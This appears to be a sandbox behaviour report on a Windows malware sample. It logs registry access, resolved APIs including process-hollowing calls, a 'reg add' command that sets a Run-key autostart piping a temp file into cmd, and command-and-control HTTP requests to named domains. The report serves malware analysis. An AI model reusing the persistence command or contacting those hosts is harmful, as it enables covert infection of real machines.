HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas

Write Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.GlobalMemoryStatusEx
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.GetModuleFileNameW
shfolder.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.LocalFree
kernel32.dll.CreatePipe
kernel32.dll.DuplicateHandle
kernel32.dll.GetStdHandle
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.CreateProcessW
kernel32.dll.GetFileType
kernel32.dll.GetConsoleCP
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.GetConsoleOutputCP
kernel32.dll.WriteFile
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
kernel32.dll.SetThreadUILanguage
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
ntdll.dll.NtQueryInformationProcess
kernel32.dll.GetTempPathW
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess

Execute Commands

"cmd"
"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe"
reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "chdskskas" /d "cmd /c type "C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt" | cmd"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2018-03-22 17:41:03 2018-03-22 17:43:53 170

16 HTTP Request(s) detected

http://www.oneconvey.com/hx211/?T8kD=9PqKCYaL4ktdzdkjrzryBrlutbCL2A7sV4xpCECdOwR61Acufzdy+EGBMBd8ZgLHII3M4+F+&Vnw0Z=-Z2hTbdPQ2dhN4y
  • Hostname: www.oneconvey.com
  • IP Address: 192.161.187.200
  • Port: 80
  • Count: 1

GET /hx211/?T8kD=9PqKCYaL4ktdzdkjrzryBrlutbCL2A7sV4xpCECdOwR61Acufzdy+EGBMBd8ZgLHII3M4+F+&Vnw0Z=-Z2hTbdPQ2dhN4y HTTP/1.1
Host: www.oneconvey.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.findingourspot.com/hx211/?T8kD=y5lVWRGfsSZED45cYSa2JRaiiXo50zt1/cPv7v7UQykSw/3CcZo8r43qtablqdkikYz49EWl&Vnw0Z=-Z2hTbdPQ2dhN4y
  • Hostname: www.findingourspot.com
  • IP Address: 216.58.205.115
  • Port: 80
  • Count: 1

GET /hx211/?T8kD=y5lVWRGfsSZED45cYSa2JRaiiXo50zt1/cPv7v7UQykSw/3CcZo8r43qtablqdkikYz49EWl&Vnw0Z=-Z2hTbdPQ2dhN4y HTTP/1.1
Host: www.findingourspot.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.findingourspot.com/hx211/
  • Hostname: www.findingourspot.com
  • IP Address: 216.58.205.115
  • Port: 80
  • Count: 1

POST /hx211/ HTTP/1.1
Host: www.findingourspot.com
Connection: close
Content-Length: 2198
Cache-Control: no-cache
Origin: http://www.findingourspot.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.findingourspot.com/hx211/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

